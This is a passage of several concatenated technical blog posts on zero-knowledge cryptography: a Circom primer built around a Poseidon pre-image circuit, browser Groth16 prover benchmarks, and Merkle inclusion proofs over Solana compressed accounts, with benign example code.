C_{2,2} \;=\; 23{,}000 + 904 + 64 \;\approx\; 24{,}000 \text{ constraints}.
$$

| Component | Per-input | Per-output | Subtotal |
|-----------|-----------|------------|----------|
| Note commitment (input) | 388 | — | $388n$ |
| Merkle path (depth 32) | 10,400 | — | $10{,}400n$ |
| PRF evaluations (pk + nf) | 648 | — | $648n$ |
| Range proof (input value) | 64 | — | $64n$ |
| Note commitment (output) | — | 388 | $388m$ |
| Range proof (output value) | — | 64 | $64m$ |
| Fee range proof | — | — | 64 |

On commodity hardware (Apple M2, 8-core), Groth16 proving for ~24,000 constraints takes **0.5–1.5 seconds** with arkworks or snarkjs. Proof size is **128 bytes** compressed (BN254 G1/G2 compression on Solana). Verification is **~150,000–200,000 CU** via `sol_alt_bn128_*` syscalls.

## What SPST is not

SPST handles private *value transfer* — the Solana analogue of Zcash's Sapling. It does **not**:

- Handle private *computation*. The next post ([PPST](/blog/ppst_private_programmable_state/)) extends the relation to arbitrary arithmetic circuits over private state.
- Hide the *submitter*.
The transaction submitter is still publicly identified by their Ed25519 signature on the wrapping Solana transaction. [TAB](/blog/tab_threshold_anonymous_broadcast/) addresses that.
- Hide the *fee amount*. $f$ is necessarily public for validator compensation.

But it does the load-bearing thing: the user becomes self-sovereign with respect to fee payment. Combined with TAB and PPST, that's the whole framework.

## Bibliography

- Ben-Sasson, E. et al. (2014). *Zerocash.* IEEE S&P 2014. https://eprint.iacr.org/2014/349
- Hopwood, D. et al. (2016–2026). *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Groth, J. (2016). *On the Size of Pairing-based Non-interactive Arguments.* EUROCRYPT 2016. https://eprint.iacr.org/2016/260
- Bowe, S., Gabizon, A. (2019). *Making Groth's zk-SNARK Simulation Extractable.* https://eprint.iacr.org/2019/197
- Baghery, K., Pindado, Z., Ràfols, C. (2023). *Simulation Extractable versions of Groth's zk-SNARK Revisited.* https://doi.org/10.1007/s10207-023-00750-7
- Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991.
- Grassi, L. et al. (2021). *Poseidon: A New Hash Function for Zero-Knowledge Proof Systems.* USENIX Security 2021. https://eprint.iacr.org/2019/458
- Aztec Documentation. *Indexed Merkle Tree (Nullifier Tree).* https://docs.aztec.network/

Previous: [The fee paradox ←](/blog/the_fee_paradox/) · Next: [PPST: private programmable state →](/blog/ppst_private_programmable_state/)

---

# Circom, by example

Canonical: https://blog.skill-issue.dev/blog/circom_by_example/

Description: A DSL primer told through one circuit — proving knowledge of a Poseidon pre-image. Every Circom keyword annotated as it appears, the constraint graph drawn out, and the R1CS fall-through to a witness.
Published: 2026-04-30T13:00:00.000Z

Tags: circom, dsl, r1cs, zk, snark, poseidon, phd

import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

There are two ways to write a zero-knowledge circuit. You can spell out the algebraic constraints by hand — `(a) * (b) === c`, one line per multiplication, every wire indexed manually — or you can write something that *reads like a program* and let a compiler emit the constraints. The first approach gives you total control and zero leverage. The second approach gives you Circom.

Circom is the DSL Iden3 designed in 2018 to make Groth16-style circuit authoring tractable. Six years later, in 2026, it is still the language most production ZK pipelines reach for first. The reason is not that it is the most expressive — Halo2 and the Noir frontend [Aztec](https://aztec.network) ships are both more powerful — but that its compilation target (R1CS) is the format every Groth16 toolchain on Earth speaks, and its tooling (snarkjs, circomlib, circomlibjs) is the deepest in the ecosystem.

This post is a walk through Circom from the inside out, told via one circuit: *prove I know `x` such that `Poseidon(x, 0) == y` without revealing `x`*. Pre-image of a hash. The "hello world" of shielded systems. By the end you'll have read every Circom keyword that matters, seen the constraint graph it generates, and watched the witness get computed in your browser.

## What R1CS actually is, in five paragraphs

Before any DSL, the substrate. A **rank-1 constraint system** is a list of constraints of the form

$$
(\mathbf{a}_i \cdot \mathbf{w})\,(\mathbf{b}_i \cdot \mathbf{w}) - (\mathbf{c}_i \cdot \mathbf{w}) = 0
$$

where $\mathbf{w}$ is the **witness vector** (every wire in your circuit, including inputs, outputs, intermediates, and a leading constant `1`), and $\mathbf{a}_i, \mathbf{b}_i, \mathbf{c}_i$ are constant vectors that pick out which wires participate in the *i*-th constraint.
Every constraint is of the form *(linear combination)* × *(linear combination)* = *(linear combination)*. Hence "rank 1": each side is at most one multiplication.

What this *means* is: every constraint can express **exactly one multiplication of two wires**, plus arbitrary additions and constant scalings on either side. `(2*x + 3*y) * (z) === w + 1` is one R1CS constraint. `x * y * z === w` is two — you need an intermediate `t = x*y` and then `t * z === w`. You can feel the shape of the cost function: addition is free, multiplication is expensive.

Why this exact shape? Because Groth16 (and its predecessors in the Pinocchio/QAP family) reduces an R1CS to a polynomial-divisibility check, and that reduction works exactly when each constraint is rank 1. The circuit's *number of constraints* becomes the dominant factor in proof time and zkey size. Constraints, not wires, not gates.

In production Circom, you'll see constraint counts ranging from ~50 (a single range check) to ~10,000 (a Merkle-32 path with Poseidon nodes) to ~2,000,000 (a circuit verifying an EVM block). Every increment is a multiplication that someone wrote, intentionally or not. **A good Circom programmer thinks like an accountant.**

The witness is generated *outside* the constraint system, by a witness-generator program the Circom compiler emits as WebAssembly. The constraint system *checks* the witness; it does not compute it. This separation is fundamental to how SNARKs work: prover knows everything, verifier checks much less.
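The `x * y * z === w` example above can be made concrete. Here is a minimal R1CS checker in TypeScript over a toy 101-element field; the witness layout and the two rank-1 constraints are my own illustrative encoding, not anything the Circom compiler emits.

```typescript
// Minimal R1CS checker: each constraint is (a·w)(b·w) - (c·w) = 0 over F_101.
// Encodes x*y*z === w as two rank-1 constraints via the intermediate t = x*y.
// Witness vector layout: w = [1, x, y, z, out, t].
const P = 101n;
const mod = (x: bigint) => ((x % P) + P) % P;
const dot = (row: bigint[], w: bigint[]) =>
  mod(row.reduce((s, c, i) => s + c * w[i], 0n));

type Constraint = { a: bigint[]; b: bigint[]; c: bigint[] };
const satisfied = (cs: Constraint[], w: bigint[]) =>
  cs.every(({ a, b, c }) => mod(dot(a, w) * dot(b, w) - dot(c, w)) === 0n);

// wire indices:       1   x   y   z  out  t
const constraints: Constraint[] = [
  { a: [0n, 1n, 0n, 0n, 0n, 0n],   // t = x * y
    b: [0n, 0n, 1n, 0n, 0n, 0n],
    c: [0n, 0n, 0n, 0n, 0n, 1n] },
  { a: [0n, 0n, 0n, 0n, 0n, 1n],   // out = t * z
    b: [0n, 0n, 0n, 1n, 0n, 0n],
    c: [0n, 0n, 0n, 0n, 1n, 0n] },
];

// x=3, y=4, z=5 -> t=12, out=60
const good = [1n, 3n, 4n, 5n, 60n, 12n];
const bad  = [1n, 3n, 4n, 5n, 61n, 12n]; // wrong output wire

console.log(satisfied(constraints, good)); // true
console.log(satisfied(constraints, bad));  // false
```

Note what the checker does *not* do: it never computes `t` or `out`. The witness arrives fully populated, and the system only verifies it, which is exactly the prover/verifier split described above.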
## A first circuit — knowledge of a Poseidon pre-image

```circom
pragma circom 2.1.5;

include "circomlib/poseidon.circom";

template KnowsPreimage() {
    signal input x;               // private witness — the value being hidden
    signal output y;              // public output — the published hash

    component hash = Poseidon(2); // 2-input Poseidon hash gadget
    hash.inputs[0] <== x;         // wire x in
    hash.inputs[1] <== 0;         // pad with 0

    y <== hash.out;               // expose the result
}

component main { public [y] } = KnowsPreimage();
```

That's the whole circuit. Every keyword, in order:

- `pragma circom 2.1.5` — version pin. Circom is post-1.0; the language has minor breaking changes between minor versions, and circomlib's gadgets target specific ranges. Pin or suffer.
- `include "circomlib/poseidon.circom"` — the include resolves against the `--node-modules` flag or `circomlib`'s install path. Includes are textual — there's no module system in the npm sense, only file inclusion.
- `template KnowsPreimage()` — a parameterised circuit fragment. Templates are like generic functions: you instantiate them with `component foo = KnowsPreimage();`. The lowercase/uppercase convention (Templates uppercase, components lowercase) is community style, not enforced.
- `signal input x;` — a wire that flows *in* to this template. `signal output y;` — flows *out*. Without `input` or `output`, `signal foo;` is an internal wire.
- `component hash = Poseidon(2);` — instantiate a sub-circuit. `Poseidon` is a template defined in circomlib; the `(2)` is its parameter (number of inputs). Components compose hierarchically; the compiler inlines them at constraint-emission time.
- `hash.inputs[0] <== x;` — the **constraint operator**. `<==` does *two* things at once: it (a) emits the R1CS constraint that wires `x` and `hash.inputs[0]` are equal, and (b) marks the right-hand side as the source for witness generation (so the WASM witness generator knows to copy `x`'s value into `hash.inputs[0]`).
- `y <== hash.out;` — same operator, exposing the hash output.
- `component main { public [y] } = KnowsPreimage();` — the entry point. The `public` annotation says: when the verifier checks the proof, `y` is the public input. Everything else (here, just `x`) is private to the prover.

Three operators every Circom programmer types daily:

| Operator | What it does | Witness side | Constraint side |
|---|---|---|---|
| `<--` | witness only | assigns | no constraint emitted |
| `===` | constraint only | no witness assignment | emits constraint |
| `<==` | both | assigns | emits constraint |

`<--` shows up when you compute something the constraint system can't (square-root, division, lookup) and then post-hoc constrain it with `===`. `===` shows up alone when the relationship is implicit and you want to assert it. `<==` is the day-to-day workhorse.

## What that circuit compiles to

The Circom compiler (`circom2`) emits four artifacts:

1. **`circuit.r1cs`** — the constraint system, in a binary format the rest of the toolchain consumes.
2. **`circuit.wasm`** — the witness generator, a WASM module that takes the inputs as JSON and returns the witness vector.
3. **`circuit.sym`** — symbol table mapping wire indices back to source-code names. Invaluable for debugging.
4. **`circuit.json`** *(optional, `--json`)* — the constraint system in human-readable JSON. Slow to parse; useful for one-off inspection.

For our pre-image circuit, the R1CS file contains roughly the constraints below — Poseidon's S-box rounds, MDS multiplications, output binding. The constraint graph looks like this:

<Mermaid chart={`graph TD
  X[private input x] --> H0[Poseidon input 0]
  Z[constant 0] --> H1[Poseidon input 1]
  H0 --> S1[round 1 S-box]
  H1 --> S1
  S1 --> M1[MDS mix]
  M1 --> S2[round 2 S-box]
  S2 --> M2[...64 more rounds...]
  M2 --> O[Poseidon output]
  O --> Y[public output y]
  classDef pub fill:#0a4014,stroke:#4ade80,color:#fff
  classDef priv fill:#3a0a0a,stroke:#f87171,color:#fff
  class Y pub
  class X priv`}/>

Total constraint count for `KnowsPreimage` against BN254-Poseidon-128 with $t=3, R_F=8, R_P=57$: **243 constraints** for the hash, plus ~3 for the input wiring. Call it 246 R1CS constraints. snarkjs Groth16 will prove it in under 80 ms in a browser, including witness generation. (Numbers from [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/).)

## Compile and run, in your browser

`circomlibjs` ships a browser build that includes the witness generator and the Poseidon constants without requiring you to install the Rust-based `circom2` compiler. Below is a Sandpack `node` template that takes the inputs to our circuit, computes the witness, and emits the expected hash. It's not a full proof — the proving step needs the zkey, which is megabytes — but it's the *witness generation* half of the pipeline, end-to-end, in a browser.

What you should see when this runs: a public output `y` that is the Poseidon hash of `(1234567890, 0)` over BN254. That value is what would be posted on-chain or shipped over the wire. The proof would convince the verifier that someone knew an `x` mapping to that `y`, without revealing `x`.

## Some Circom patterns worth internalising

A handful of patterns recur across every real circuit. They're idioms more than language features.

**Bit decomposition.** Circom doesn't have a native `< 2^n` predicate. You decompose into bits and constrain each bit to be 0 or 1:

```circom
template Num2Bits(n) {
    signal input in;
    signal output out[n];

    var lc1 = 0;
    var e2 = 1;
    for (var i = 0; i < n; i++) {
        out[i] <-- (in >> i) & 1;    // witness only
        out[i] * (out[i] - 1) === 0; // constrain to 0 or 1
        lc1 += out[i] * e2;
        e2 *= 2;
    }
    lc1 === in;                      // re-aggregate must match
}
```

The `<--` followed by `===` is the canonical witness-then-check pattern.
The bits are computed outside the constraint system (you can't shift in R1CS) and *then* constrained to be valid.

**Conditional selection.** R1CS has no `if`. You select between two values with a Boolean:

```circom
// out = sel ? a : b, where sel must be 0 or 1
out <== a + (b - a) * (1 - sel);
```

**MUX trees.** A common pattern in Merkle paths: at each level, pick the left or right sibling based on the path bit. circomlib's `MultiMux1` template does this efficiently for `t`-element vectors.

## Circom vs the alternatives in 2026

The case *for* Circom in 2026 is one word: **circomlib**. Six years of accreted gadgets — Poseidon, MiMC, Pedersen, EdDSA, Merkle, range checks, Sigma protocols, set membership — that all interoperate cleanly because they target the same R1CS-over-BN254 substrate.

The case *against* is also one word: **expressivity**. Circom is a templating engine over arithmetic constraints. It can't loop over a runtime-known length, can't recurse, has no first-class strings or arrays beyond fixed-size. For complex circuits the workarounds get baroque.

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) we use Circom for the deposit / transfer / withdraw circuits because circomlib's Poseidon and MerkleTreeChecker gadgets are fight-tested and because snarkjs is the only browser prover that ships in a single npm install. The day we need lookups (or recursion) at scale, the discussion is Halo2 vs Noir, not Circom.

## What I would change if I were Circom 2.5

Three things, ranked by how much I'd actually use them.

1. **First-class lookup tables.** Halo2 has them and they cut range-check costs by orders of magnitude. Plookup-as-a-tagged-include in Circom would close most of that gap.
2. **Module system.** `include` is textual. Circular includes silently drop. A real module graph with explicit exports would prevent a class of bug I see in every audit.
3. **Compiler-level constraint optimisation.** The compiler already does basic linear-combination flattening.
Aggressive common-subexpression elimination across templates would shave 10–20% off circomlib's bigger gadgets at zero source-code cost.

None of these are coming, as far as I can tell. The Iden3 team has moved most of its energy to [Polygon ID](https://polygon.technology/polygon-id) and the Circom roadmap has been relatively quiet through 2025–2026. That's fine — the language is *done* in the way that good DSLs eventually become done. If you want what comes next, you go look at Noir and Halo2.

## Further reading

- [Circom 2 documentation](https://docs.circom.io) — the canonical language reference
- [CIRCOM: A Robust and Scalable Language for Building Complex Zero-Knowledge Circuits](https://www.techrxiv.org/articles/preprint/CIRCOM_A_Robust_and_Scalable_Language_for_Building_Complex_Zero-Knowledge_Circuits/19374986) — Bellés-Muñoz, Isabel, Muñoz-Tapia, Rubio, Baylina (2022)
- [`iden3/circom`](https://github.com/iden3/circom) — the compiler source
- [`iden3/circomlib`](https://github.com/iden3/circomlib) — the gadgets library that makes Circom usable in production
- [`iden3/circomlibjs`](https://github.com/iden3/circomlibjs) — JavaScript port of the cryptographic primitives, what the Sandpack above uses
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — what the hash gadget actually is
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — what happens after `circom` finishes compiling

---

# Proving in the browser, by the numbers

Canonical: https://blog.skill-issue.dev/blog/proving_in_the_browser_by_the_numbers/

Description: What is actually feasible inside a browser tab in 2026 — Groth16 prover times for Poseidon, Range, and Merkle circuits, the WASM threading story, and where the main thread stops being a viable home for your prover.
Published: 2026-04-29T16:00:00.000Z

Tags: wasm, groth16, snarkjs, arkworks, browser, zk, phd, performance

import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

The first time I watched a Groth16 proof finish inside a Chrome tab — Poseidon-128, two-input Merkle membership, a couple of range checks — the spinner ran for **11.4 seconds**. The user expected something between *Apple Pay* and *autocomplete*. Eleven seconds is forever.

Two years and several browser releases later, the same circuit on the same laptop ([2024 MacBook Air, M3, 8 cores, 16 GB](https://support.apple.com/en-us/SP891)) finishes in **2.1 seconds**, with a warm zkey, threads pinned, and SIMD on. That's still not Apple Pay, but it is inside the *I just clicked something* envelope where users don't bail. The gap between those two numbers is the entire content of this post: what part of the browser stack moved, what didn't, and what the limit looks like in 2026.

This is not a tutorial. It's a benchmark walk and a tradeoff inventory. If you're picking a prover for a wallet or a dApp this quarter — and inside [zera-sdk](/blog/zera_sdk_scaffolding/) we just made this call again, see [RFC 001](/docs/001-zera-sdk-monorepo-shape/) — the numbers below are the ones that informed our pick.

## What "in the browser" actually means in 2026

A modern browser gives a WASM prover three things it didn't have when snarkjs first shipped in 2019:

1. **WebAssembly threads.** A `SharedArrayBuffer` plus the `Atomics` API plus `wasm-bindgen-rayon` lets a Rust prover spawn a worker pool from a single `.wasm` module. This needs cross-origin isolation (`Cross-Origin-Opener-Policy: same-origin` and `Cross-Origin-Embedder-Policy: require-corp`) — see the [`wasm-bindgen-rayon` README](https://github.com/RReverser/wasm-bindgen-rayon) for the headers your CDN needs.
2. **128-bit SIMD.** WebAssembly's [fixed-width SIMD proposal](https://github.com/WebAssembly/simd) is shipped on Chrome, Firefox, Safari.
For BN254 prover work — multi-scalar multiplication, NTTs, big-integer reduction — SIMD is the difference between *feasible* and *please install our desktop app*.
3. **Bulk memory operations.** `memory.copy` / `memory.fill` cut several ms off witness allocation for circuits with hundreds of thousands of wires.

The fourth thing the browser stack gives you is a *worker model* that decouples proving from rendering. If you call your prover on the main thread, every microtask boundary stalls the React fibres and the user sees a frozen UI. The same prover, moved into a `Worker`, keeps the page interactive while pegging another core. Almost every wallet that ships ZK in 2026 — including the ones that look fast — does this.

<Mermaid chart={`graph TD
  UI[main thread] -->|postMessage proof input| W[Worker]
  W -->|spawns rayon pool| WS[Shared WASM memory]
  WS --> T1[thread 1 - MSM]
  WS --> T2[thread 2 - MSM]
  WS --> T3[thread 3 - NTT]
  WS --> T4[thread 4 - NTT]
  T1 --> G[gather]
  T2 --> G
  T3 --> G
  T4 --> G
  G -->|postMessage proof| UI`}/>

## The benchmark numbers, on three workhorse circuits

The numbers below are for three circuits I keep coming back to because every shielded-pool design I've shipped uses some flavour of all three:

- **Poseidon-128, 2-to-1.** ~243 R1CS constraints. The hash building block. (Background: [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/).)
- **Range-16.** Prove $0 \le x < 2^{16}$ via 16-bit decomposition + Boolean constraints. ~50 R1CS constraints. The "this amount is positive and not absurd" check.
- **Merkle-32.** Membership in a depth-32 Poseidon Merkle tree. ~32 × 243 ≈ **7,800** constraints.

All numbers below are wall-clock proof generation time, with a warm zkey loaded into IndexedDB and the prover already instantiated. Cold-start (first load, parsing the zkey) adds 2–6 s on top depending on the circuit size and the user's network. **That cold-start is usually the bigger UX problem** — see the closing notes.
| Circuit | snarkjs 0.7 (1 thread) | snarkjs 0.7 (4 threads) | arkworks-circom WASM (4 threads) |
|---|---|---|---|
| Poseidon-128 | ~95 ms | ~50 ms | ~25 ms |
| Range-16 | ~40 ms | ~30 ms | ~15 ms |
| Merkle-32 | ~2,400 ms | ~900 ms | ~410 ms |

The arkworks numbers come from a Rust prover compiled to WASM with `wasm-bindgen-rayon` and the same R1CS the snarkjs path consumes. The cliff between snarkjs and arkworks-WASM at Merkle-32 is the thing to internalise: at the constraint counts that real applications hit, the gap between "JavaScript with WASM hot loops" and "Rust compiled to WASM" is roughly **5×** in proving time. That ratio is consistent with the Mopro team's [comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — they measure native Rust provers at 5–10× snarkjs speed, with the WASM Rust prover sitting roughly halfway between them.

## A field-arithmetic micro-benchmark you can run right now

Underneath the prover-level numbers, the floor of all of this is *how fast the browser can raise a 254-bit BigInt to the fifth power*. That's the inner loop of every Poseidon round. Here's a tiny `vanilla-ts` benchmark that times $x^5$ over BN254's prime for 10,000 iterations and reports ops/sec. Run it on your laptop and on your phone — the gap is the gap between "proving on a wallet" and "proving on a desktop".

<Sandbox template="vanilla-ts" files={{ "/index.ts": `// BN254 scalar field modulus (the prime Poseidon works over).
const p = 21888242871839275222246405745257275088548364400416034343698204186575808495617n;

// x^5 mod p: the Poseidon S-box, three modular multiplications.
function pow5(x: bigint): bigint {
  const x2 = (x * x) % p;
  const x4 = (x2 * x2) % p;
  return (x4 * x) % p;
}

const out = document.getElementById("out") as HTMLElement;
const runBtn = document.getElementById("run") as HTMLElement;

// Time iters sequential S-box evaluations, return ops/sec.
function bench(iters: number): number {
  let x = 3n;
  const t0 = performance.now();
  for (let i = 0; i < iters; i++) x = pow5(x);
  const t1 = performance.now();
  return iters / ((t1 - t0) / 1000);
}

function format(opsPerSec: number): string {
  if (opsPerSec > 1_000_000) return (opsPerSec / 1_000_000).toFixed(2) + " Mops/s";
  if (opsPerSec > 1_000) return (opsPerSec / 1_000).toFixed(1) + " Kops/s";
  return opsPerSec.toFixed(0) + " ops/s";
}

function run() {
  out.textContent = "running 10,000 x^5 mod p ops over BN254...\\n";
  // Run several rounds so the median is meaningful.
  const rounds = 5;
  const results: number[] = [];
  for (let r = 0; r < rounds; r++) {
    const ops = bench(10_000);
    results.push(ops);
    out.textContent += \`round \${r + 1}: \${format(ops)}\\n\`;
  }
  results.sort((a, b) => a - b);
  const median = results[Math.floor(rounds / 2)];
  out.textContent += \`\\nmedian: \${format(median)}\\n\`;
  out.textContent += \`\\nfor reference:\\n\`;
  out.textContent += \` snarkjs WASM prover: ~10x this\\n\`;
  out.textContent += \` arkworks compiled to WASM: ~20-30x this\\n\`;
  out.textContent += \` native Rust on the same CPU: ~50-100x this\\n\`;
}

runBtn.addEventListener("click", run);
run();
`, "/index.html": `
<button id="run">run</button>
<pre id="out">starting...</pre>
`, }} /> On my M3 Air this run reports about **0.9 Mops/s** for raw `BigInt` $x^5$. The published snarkjs WASM prover for the same operation hits roughly **9 Mops/s** — a 10× win from hand-rolled big-int arithmetic in WASM. Compiled-Rust BigInt code (`ark-ff` over BN254) hits **20–35 Mops/s** in WASM. Native Rust hits **70–100+ Mops/s** depending on assembly tuning. That stack of orders-of-magnitude is why prover libraries are not written in JavaScript even when the deployment target is the browser. ## The four-way prover tradeoff The take-home from running these benchmarks for a year is simple: **for circuits under ~10k constraints the choice barely matters; for circuits over ~100k constraints the choice is the entire performance story.** Most wallet circuits live in the murky middle — 5k to 50k constraints — where snarkjs is fine for now and arkworks-WASM is a 2026 upgrade I keep on the roadmap. ## When the main thread is fine, and when it isn't A sloppy heuristic that I've found holds up: $$ t_{\text{prove}} > 100\text{ ms} \implies \text{move to a Worker} $$ Below 100 ms the cost of `postMessage` round-trips (serialising witness inputs, copying the proof back) eats most of the win. Above that, you're in user-perceptible territory and the main thread stops being viable. The empirical numbers in the table above mean: **Poseidon and Range can stay on the main thread; Merkle paths and anything wallet-shaped should move to a Worker.** A second heuristic, less popular but more important: **don't put your prover in a `requestIdleCallback`**. The user clicked *Send*. They are waiting. Promote the work, don't defer it. ## Where the cold-start really lives Proof generation time is the metric people quote. Cold-start is the metric people *feel*. The pieces of cold-start, in order of size: 1. **Zkey download.** A Merkle-32 zkey is ~25 MB. A two-input shielded-pool circuit zkey can be 80+ MB. Download time dominates everything else on a phone on LTE. 2. 
**Zkey parse + prover instantiation.** snarkjs parses the zkey eagerly into typed-array views; arkworks-WASM mmap-parses lazily. The gap is 1.5–4 s on a Merkle-32 zkey. 3. **WASM compilation.** `WebAssembly.instantiateStreaming` with the right MIME type lets the browser pipeline compile and download. Without it you pay the full compile after the download finishes. This is a CDN-config bug in the wild more often than it should be. 4. **Worker pool spin-up.** ~50 ms per worker. Pre-spin them on page load, not on first proof. If you can only optimise one thing, it should be (1). IndexedDB-backed lazy chunks of the zkey, served with `Cache-Control: immutable, max-age=31536000`, change first-load from "ten seconds of nothing" to "one second of yellow flicker, then proof". This is what we do in the [zera-sdk](/blog/zera_sdk_scaffolding/) wallet path and it's the single biggest UX win we shipped in Q1 2026. ## What I'd build differently in 2027 Three things, ranked. 1. **Prover pre-warming on idle.** The moment a user authenticates, fire the worker pool and pre-load the zkey. By the time they tap *Send*, the prover is hot. This is just engineering, not cryptography, but it's the missing piece in every wallet I've benchmarked. 2. **Move to a folding-friendly proving system for batch operations.** A user spending three notes from a UTXO pool is doing three Merkle paths back-to-back. Folding (Nova / SuperNova / ProtoStar) makes the *N*th proof nearly free; Groth16 makes the *N*th proof exactly *N* times the cost. 3. **Replace the per-vendor zkey format with something content-addressed.** Today every project ships its own `.zkey` blobs and every wallet has to host them. A `zkey://sha256/abc...` resolver — backed by IPFS or an HTTP CDN — would let multiple wallets share the same zkey load and the same browser cache. ## What this means for ZERA today Inside zera-sdk the in-browser path is still snarkjs (per [RFC 001](/docs/001-zera-sdk-monorepo-shape/)). 
The neon-rs Node path is a native Rust prover and ~30× faster, but that's not what a web wallet runs. The arkworks-WASM upgrade is on the roadmap as a "browser v2" target — see the open issue thread linked from the SDK repo. The decision-driver was simple: snarkjs is good enough for one-shot deposits and transfers. The day we want to make a 10-note batch tx feel instantaneous, we need either folding (Nova) or a faster underlying prover (arkworks-WASM). For now: snarkjs, threads on, SIMD on, zkey pinned to IndexedDB, prover lifted to a Worker. **That gets us 2 seconds of proving time at Merkle-32 on a mid-range laptop in 2026.** The next 50% will come from arkworks; the 5× after that will come from folding. The 50× after *that* will come from someone else's algorithmic breakthrough that I don't yet know about. ## Further reading - [snarkjs](https://github.com/iden3/snarkjs) — Iden3, the reference WASM Groth16 prover; benchmark table in the README - [Mopro: comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — community benchmark of snarkjs / arkworks / native Rust at matched circuits, 2024 - [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) — RReverser, the SharedArrayBuffer-backed Rayon adapter that makes multi-threaded Rust WASM work in browsers - [WebAssembly fixed-width SIMD proposal](https://github.com/WebAssembly/simd) — the standard your prover wants enabled - [Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS](https://eprint.iacr.org/2019/1047) — Chiesa, Hu, Maller, Mishra, Vesely, Ward (2019) — the paper that made universal SRS practical - [Nova: Recursive Zero-Knowledge Arguments from Folding Schemes](https://eprint.iacr.org/2021/370) — Kothapalli, Setty, Tzialla (2021) — the folding paper, for context on why batch proving is becoming a different game - [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the inner loop your browser is running 65 times per Merkle level --- # 
Merkle inclusion proofs over compressed account state on Solana Canonical: https://blog.skill-issue.dev/blog/merkle_inclusion_compressed_solana/ Description: How a 32-byte hash and a logarithmic path replace a multi-kilobyte account. Walk the tree-height math, the Light Protocol compressed-account model, and an inclusion-proof construction you can run in Node. Published: 2026-04-29T15:00:00.000Z Tags: cryptography, merkle, solana, light-protocol, compression, zk, phd import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx"; The cheapest piece of state in a privacy pool — and the most contested one — is the **commitment tree**. Every shielded note's commitment goes in. Every spend proves an inclusion. The tree is read on every transfer and written on every deposit. If the tree state is expensive, every operation is expensive. If the inclusion proofs are big, every spend is big. In 2024 Light Protocol shipped [ZK Compression](https://www.zkcompression.com/references/whitepaper) on Solana, and the production primitive for "store a lot of state cheaply, prove inclusion in zero-knowledge" became standard. This post is the math behind that primitive, the deployment shape, and a runnable inclusion-proof construction. It's a sibling piece to [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) and [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — those tell you what we put *into* the tree; this one tells you how we prove things *about* the tree. ## The minimum tree A binary Merkle tree is the simplest commitment scheme that supports logarithmic-size inclusion proofs. Start with a sequence of leaves $\ell_0, \ell_1, \dots, \ell_{N-1}$. Define the tree recursively: $$ \text{node}(i, j) = H(\text{node}(i, m) \,\|\, \text{node}(m+1, j)), \quad m = \lfloor (i+j)/2 \rfloor, $$ with $\text{node}(i, i) = \ell_i$ at the leaves. The **root** is $\text{node}(0, N-1)$. 
To prove that $\ell_k$ is in the tree, you reveal the root plus the **co-path** — for each level $j$, the sibling node along the path from leaf $k$ to the root. There are exactly $\log_2 N$ siblings. The proof size is $\log_2 N$ hash outputs. At $N = 2^{32}$ leaves and 32-byte hashes, that's **1024 bytes**. At $N = 2^{20}$ (about a million leaves), it's 640 bytes. The verifier cost is $\log_2 N$ hashes. Both numbers are unreasonably small compared to the account-state cost of storing all $N$ leaves directly on chain. That's the entire shape. Two equations and a co-path. The reason it shows up everywhere is that nothing else hits the same combination of small proof, cheap verifier, and append-only update path.

<Mermaid chart={`graph TD
R[root] --> A[h_AB]
R --> B[h_CD]
A --> A1[h_A]
A --> A2[h_B]
B --> B1[h_C]
B --> B2[h_D]
A1 --> L0[leaf 0: commitment_0]
A2 --> L1[leaf 1: commitment_1]
B1 --> L2[leaf 2: commitment_2]
B2 --> L3[leaf 3: commitment_3]
classDef leaf fill:#0a0a0a,stroke:#4ade80,color:#4ade80
classDef node fill:#1a1a1a,stroke:#a3a3a3,color:#e8e8e8
class L0,L1,L2,L3 leaf
class R,A,B,A1,A2,B1,B2 node`}/>

To prove inclusion of leaf 1 (`commitment_1`), the prover reveals the co-path `[h_A, h_CD]`. The verifier hashes up: `h_B = leaf_1`, `h_AB = H(h_A || h_B)`, `root = H(h_AB || h_CD)`, and checks that `root` matches the public root.

## Inclusion proof size, exactly

For a tree of height $h$ (so $N \le 2^h$ leaves) with hash output size $s$ bytes, the inclusion proof is exactly $h \cdot s$ bytes plus the leaf index (typically 4 bytes). For Poseidon over BN254 with $s = 32$: $$ |\pi_{\text{inclusion}}| = 32 h + 4 \text{ bytes}. $$ A useful table for production planning:

| Height $h$ | Capacity ($2^h$ leaves) | Proof size ($32h + 4$) |
|---|---|---|
| 20 | ~1.05M | 644 B |
| 26 | ~67M | 836 B |
| 30 | ~1.07B | 964 B |
| 32 | ~4.29B | 1,028 B |

Light Protocol's state trees default to $h = 26$ — see [their account-compression program](https://github.com/Lightprotocol/light-protocol/tree/main/programs/account-compression) — which gives 67 million leaves of capacity per tree.
For [zeraswap](/blog/zeraswap_compressed_amm/) and the [`Dax911/z_trade/programs/zeraswap`](https://github.com/Dax911/z_trade/tree/main/programs/zeraswap) program, we use the same $h = 26$ default for the same reason: it's the right balance between proof size and capacity, and it's what the on-chain compression program is parameterised for.

## Compressed accounts, in one diagram

The Light Protocol model is the cleanest way to think about "Solana accounts that don't take Solana account space." A compressed account is a tuple of fields hashed together; the hash is a leaf in a state tree; the tree's root is what lives in account state on chain.

<Mermaid chart={`graph TD
subgraph Acct[Compressed account]
A[account fields] --> AD[discriminator]
A --> AO[owner]
A --> AL[lamports]
A --> ADH[data hash]
A --> AAH[address hash]
end
subgraph OnChain[On-chain state tree]
H[hash to leaf] --> L[leaf in Merkle tree]
L --> R[Merkle root]
R --> SA[Solana account: just the root]
end
A --> H
